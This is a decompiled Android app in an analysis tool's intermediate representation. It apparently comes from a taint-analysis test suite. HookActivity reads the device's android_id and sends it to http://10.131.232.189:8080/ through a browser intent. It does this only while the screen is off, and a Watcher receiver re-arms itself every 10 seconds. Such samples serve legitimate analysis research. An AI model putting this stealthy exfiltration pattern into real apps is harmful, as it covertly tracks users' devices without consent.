record [|com:fgweihlp:wfgnp:HlpRestart|]  @type class @AccessFlag PUBLIC extends  [|java:lang:Runnable|] {
      [|android:content:Context|] [|com:fgweihlp:wfgnp:HlpRestart.c|]    @AccessFlag PRIVATE;
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HlpRestart.<init>|] ([|com:fgweihlp:wfgnp:HlpRestart|] v0 @type (this), [|android:content:Context|] v1 @type (object)) @owner [|com:fgweihlp:wfgnp:HlpRestart|] @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.<init>:(Landroid/content/Context;)V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02b94c.   call temp:=  [|java:lang:Object.<init>|](v0) @signature [|Ljava/lang/Object;.<init>:()V|] @classDescriptor [|java:lang:Object|] @type direct;
#L02b952.   v0.[|com:fgweihlp:wfgnp:HlpRestart.c|]  := v1 @type object;
#L02b956.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HlpRestart.run|] ([|com:fgweihlp:wfgnp:HlpRestart|] v3 @type (this)) @owner [|com:fgweihlp:wfgnp:HlpRestart|] @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.run:()V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
      
#L02b968.   v0:= v3.[|com:fgweihlp:wfgnp:HlpRestart.c|]   @type object;
#L02b96c.   v1:= new [|android:content:Intent|];
#L02b970.   v2:= "com.fgweihlp.wfgnp.Watcher.RUN" @type (object, string);
#L02b974.   call temp:=  [|android:content:Intent.<init>|](v1, v2) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02b97a.   call temp:=  [|android:content:Context.sendBroadcast|](v0, v1) @signature [|Landroid/content/Context;.sendBroadcast:(Landroid/content/Intent;)V|] @classDescriptor [|android:content:Context|] @type virtual;
#L02b980.   return @void ;

   }
record [|com:fgweihlp:wfgnp:HookActivity|]  @type class @AccessFlag PUBLIC  extends [|android:app:Activity|] {
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.home|]    @AccessFlag PUBLIC_FINAL;
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.id|]    @AccessFlag PRIVATE;
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.shelloutput|]    @AccessFlag PUBLIC;
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.<init>|] ([|com:fgweihlp:wfgnp:HookActivity|] v1 @type (this)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
        v0;
      
#L02b994.   call temp:=  [|android:app:Activity.<init>|](v1) @signature [|Landroid/app/Activity;.<init>:()V|] @classDescriptor [|android:app:Activity|] @type direct;
#L02b99a.   v0:= "http://10.131.232.189:8080/" @type (object, string);
#L02b99e.   v1.[|com:fgweihlp:wfgnp:HookActivity.home|]  := v0 @type object;
#L02b9a2.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.onCreate|] ([|com:fgweihlp:wfgnp:HookActivity|] v4 @type (this), [|android:os:Bundle|] v5 @type (object)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.onCreate:(Landroid/os/Bundle;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
      
#L02b9b4.   call temp:=  [|android:app:Activity.onCreate|](v4, v5) @signature [|Landroid/app/Activity;.onCreate:(Landroid/os/Bundle;)V|] @classDescriptor [|android:app:Activity|] @type super;
#L02b9ba.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.getContentResolver|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.getContentResolver:()Landroid/content/ContentResolver;|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02b9c0.   v1:= temp  @type object;
#L02b9c2.   v2:= "android_id" @type (object, string);
#L02b9c6.   call temp:=  [|android:provider:Settings$Secure.getString|](v1, v2) @signature [|Landroid/provider/Settings$Secure;.getString:(Landroid/content/ContentResolver;Ljava/lang/String;)Ljava/lang/String;|] @classDescriptor [|android:provider:Settings$Secure|] @type static;
#L02b9cc.   v1:= temp  @type object;
#L02b9ce.   v4.[|com:fgweihlp:wfgnp:HookActivity.id|]  := v1 @type object;
#L02b9d2.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.getIntent|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.getIntent:()Landroid/content/Intent;|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02b9d8.   v1:= temp  @type object;
#L02b9da.   call temp:=  [|android:content:Intent.getData|](v1) @signature [|Landroid/content/Intent;.getData:()Landroid/net/Uri;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02b9e0.   v1:= temp  @type object;
#L02b9e2.   call temp:=  [|android:net:Uri.getPath|](v1) @signature [|Landroid/net/Uri;.getPath:()Ljava/lang/String;|] @classDescriptor [|android:net:Uri|] @type virtual;
#L02b9e8.   v0:= temp  @type object;
#L02b9ea.   v1:= "wfg" @type (object, string);
#L02b9ee.   v2:= new [|java:lang:StringBuilder|];
#L02b9f2.   v3:= "Action: " @type (object, string);
#L02b9f6.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02b9fc.   call temp:=  [|java:lang:StringBuilder.append|](v2, v0) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba02.   v2:= temp  @type object;
#L02ba04.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba0a.   v2:= temp  @type object;
#L02ba0c.   call temp:=  [|android:util:Log.d|](v1, v2) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02ba12.   if v0 == 0 then goto L02ba76;
#L02ba16.   v1:= "Hook" @type (object, string);
#L02ba1a.   v2:= new [|java:lang:StringBuilder|];
#L02ba1e.   v3:= "Action: " @type (object, string);
#L02ba22.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02ba28.   call temp:=  [|java:lang:StringBuilder.append|](v2, v0) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba2e.   v2:= temp  @type object;
#L02ba30.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba36.   v2:= temp  @type object;
#L02ba38.   call temp:=  [|android:util:Log.i|](v1, v2) @signature [|Landroid/util/Log;.i:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02ba3e.   v1:= "/checkin" @type (object, string);
#L02ba42.   call temp:=  [|java:lang:String.equals|](v0, v1) @signature [|Ljava/lang/String;.equals:(Ljava/lang/Object;)Z|] @classDescriptor [|java:lang:String|] @type virtual;
#L02ba48.   v1:= temp;
#L02ba4a.   if v1 == 0 then goto L02ba76;
#L02ba4e.   v1:= new [|java:lang:StringBuilder|];
#L02ba52.   v2:= "id=" @type (object, string);
#L02ba56.   call temp:=  [|java:lang:StringBuilder.<init>|](v1, v2) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02ba5c.   v2:= v4.[|com:fgweihlp:wfgnp:HookActivity.id|]   @type object;
#L02ba60.   call temp:=  [|java:lang:StringBuilder.append|](v1, v2) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba66.   v1:= temp  @type object;
#L02ba68.   call temp:=  [|java:lang:StringBuilder.toString|](v1) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba6e.   v1:= temp  @type object;
#L02ba70.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.sendByBrowser|](v4, v1) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.sendByBrowser:(Ljava/lang/String;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02ba76.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.finish|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.finish:()V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02ba7c.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.sendByBrowser|] ([|com:fgweihlp:wfgnp:HookActivity|] v4 @type (this), [|java:lang:String|] v5 @type (object)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.sendByBrowser:(Ljava/lang/String;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
      
#L02ba90.   v0:= new [|android:content:Intent|];
#L02ba94.   v1:= "android.intent.action.VIEW" @type (object, string);
#L02ba98.   v2:= new [|java:lang:StringBuilder|];
#L02ba9c.   v3:= "http://10.131.232.189:8080/?" @type (object, string);
#L02baa0.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02baa6.   call temp:=  [|java:lang:StringBuilder.append|](v2, v5) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02baac.   v2:= temp  @type object;
#L02baae.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02bab4.   v2:= temp  @type object;
#L02bab6.   call temp:=  [|android:net:Uri.parse|](v2) @signature [|Landroid/net/Uri;.parse:(Ljava/lang/String;)Landroid/net/Uri;|] @classDescriptor [|android:net:Uri|] @type static;
#L02babc.   v2:= temp  @type object;
#L02babe.   call temp:=  [|android:content:Intent.<init>|](v0, v1, v2) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;Landroid/net/Uri;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02bac4.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.startActivity|](v4, v0) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.startActivity:(Landroid/content/Intent;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02baca.   return @void ;

   }
record [|com:fgweihlp:wfgnp:MainActivity|]  @type class @AccessFlag PUBLIC  extends [|android:app:Activity|] {
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:MainActivity.<init>|] ([|com:fgweihlp:wfgnp:MainActivity|] v0 @type (this)) @owner [|com:fgweihlp:wfgnp:MainActivity|] @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02badc.   call temp:=  [|android:app:Activity.<init>|](v0) @signature [|Landroid/app/Activity;.<init>:()V|] @classDescriptor [|android:app:Activity|] @type direct;
#L02bae2.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:MainActivity.onCreate|] ([|com:fgweihlp:wfgnp:MainActivity|] v2 @type (this), [|android:os:Bundle|] v3 @type (object)) @owner [|com:fgweihlp:wfgnp:MainActivity|] @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.onCreate:(Landroid/os/Bundle;)V|] @Access PROTECTED {
      local temp ;
        v0;
        v1;
      
#L02baf4.   call temp:=  [|android:app:Activity.onCreate|](v2, v3) @signature [|Landroid/app/Activity;.onCreate:(Landroid/os/Bundle;)V|] @classDescriptor [|android:app:Activity|] @type super;
#L02bafa.   v0:= new [|android:content:Intent|];
#L02bafe.   call temp:=  [|android:content:Intent.<init>|](v0) @signature [|Landroid/content/Intent;.<init>:()V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02bb04.   v1:= "com.example.activity.XActivity.RUN" @type (object, string);
#L02bb08.   call temp:=  [|android:content:Intent.setAction|](v0, v1) @signature [|Landroid/content/Intent;.setAction:(Ljava/lang/String;)Landroid/content/Intent;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bb0e.   v0:= temp  @type object;
#L02bb10.   call temp:=  [|com:fgweihlp:wfgnp:MainActivity.startActivity|](v2, v0) @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.startActivity:(Landroid/content/Intent;)V|] @classDescriptor [|com:fgweihlp:wfgnp:MainActivity|] @type virtual;
#L02bb16.   v0:= "MainActivity" @type (object, string);
#L02bb1a.   v1:= "sent an intent" @type (object, string);
#L02bb1e.   call temp:=  [|android:util:Log.d|](v0, v1) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bb24.   return @void ;

   }

record [|com:fgweihlp:wfgnp:Watcher|]  @type class @AccessFlag PUBLIC  extends [|android:content:BroadcastReceiver|] {
   }
      global [|java:lang:String|] @@[|com:fgweihlp:wfgnp:Watcher.RUN|]    @AccessFlag PUBLIC_STATIC_FINAL;
    procedure [|void|] [|com:fgweihlp:wfgnp:Watcher.<init>|] ([|com:fgweihlp:wfgnp:Watcher|] v0 @type (this)) @owner [|com:fgweihlp:wfgnp:Watcher|] @signature [|Lcom/fgweihlp/wfgnp/Watcher;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02bbf8.   call temp:=  [|android:content:BroadcastReceiver.<init>|](v0) @signature [|Landroid/content/BroadcastReceiver;.<init>:()V|] @classDescriptor [|android:content:BroadcastReceiver|] @type direct;
#L02bbfe.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:Watcher.onReceive|] ([|com:fgweihlp:wfgnp:Watcher|] v7 @type (this), [|android:content:Context|] v8 @type (object), [|android:content:Intent|] v9 @type (object)) @owner [|com:fgweihlp:wfgnp:Watcher|] @signature [|Lcom/fgweihlp/wfgnp/Watcher;.onReceive:(Landroid/content/Context;Landroid/content/Intent;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
        v4;
        v5;
        v6;
      
#L02bc10.   v4:= "Checkin" @type (object, string);
#L02bc14.   v5:= "Running" @type (object, string);
#L02bc18.   call temp:=  [|android:util:Log.d|](v4, v5) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bc1e.   v4:= "power" @type (object, string);
#L02bc22.   call temp:=  [|android:content:Context.getSystemService|](v8, v4) @signature [|Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;|] @classDescriptor [|android:content:Context|] @type virtual;
#L02bc28.   v2:= temp  @type object;
#L02bc2a.   v2:= ([|android:os:PowerManager|])v2;
#L02bc2e.   call temp:=  [|android:os:PowerManager.isScreenOn|](v2) @signature [|Landroid/os/PowerManager;.isScreenOn:()Z|] @classDescriptor [|android:os:PowerManager|] @type virtual;
#L02bc34.   v4:= temp;
#L02bc36.   if v4 != 0 then goto L02bc7c;
#L02bc3a.   v4:= "Checkin" @type (object, string);
#L02bc3e.   v5:= "Activating" @type (object, string);
#L02bc42.   call temp:=  [|android:util:Log.d|](v4, v5) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bc48.   v1:= new [|android:content:Intent|];
#L02bc4c.   v4:= "android.intent.action.VIEW" @type (object, string);
#L02bc50.   call temp:=  [|android:content:Intent.<init>|](v1, v4) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02bc56.   v4:= "wfgnp://data/checkin" @type (object, string);
#L02bc5a.   call temp:=  [|android:net:Uri.parse|](v4) @signature [|Landroid/net/Uri;.parse:(Ljava/lang/String;)Landroid/net/Uri;|] @classDescriptor [|android:net:Uri|] @type static;
#L02bc60.   v3:= temp  @type object;
#L02bc62.   call temp:=  [|android:content:Intent.setData|](v1, v3) @signature [|Landroid/content/Intent;.setData:(Landroid/net/Uri;)Landroid/content/Intent;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bc68.   v4:= 268435456  @length high16;
#L02bc6c.   call temp:=  [|android:content:Intent.setFlags|](v1, v4) @signature [|Landroid/content/Intent;.setFlags:(I)Landroid/content/Intent;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bc72.   v4:= temp  @type object;
#L02bc74.   call temp:=  [|android:content:Context.startActivity|](v8, v4) @signature [|Landroid/content/Context;.startActivity:(Landroid/content/Intent;)V|] @classDescriptor [|android:content:Context|] @type virtual;
#L02bc7a.   return @void ;
#L02bc7c.   v4:= "Checkin" @type (object, string);
#L02bc80.   v5:= "Laying Low" @type (object, string);
#L02bc84.   call temp:=  [|android:util:Log.d|](v4, v5) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bc8a.   v0:= new [|android:os:Handler|];
#L02bc8e.   call temp:=  [|android:os:Handler.<init>|](v0) @signature [|Landroid/os/Handler;.<init>:()V|] @classDescriptor [|android:os:Handler|] @type direct;
#L02bc94.   v4:= new [|com:fgweihlp:wfgnp:HlpRestart|];
#L02bc98.   call temp:=  [|com:fgweihlp:wfgnp:HlpRestart.<init>|](v4, v8) @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.<init>:(Landroid/content/Context;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HlpRestart|] @type direct;
#L02bc9e.   v5:= 10000  @length wide16;
#L02bca2.   call temp:=  [|android:os:Handler.postDelayed|](v0, v4, v5, v6) @signature [|Landroid/os/Handler;.postDelayed:(Ljava/lang/Runnable;J)Z|] @classDescriptor [|android:os:Handler|] @type virtual;
#L02bca8.   goto L02bc7a;

   }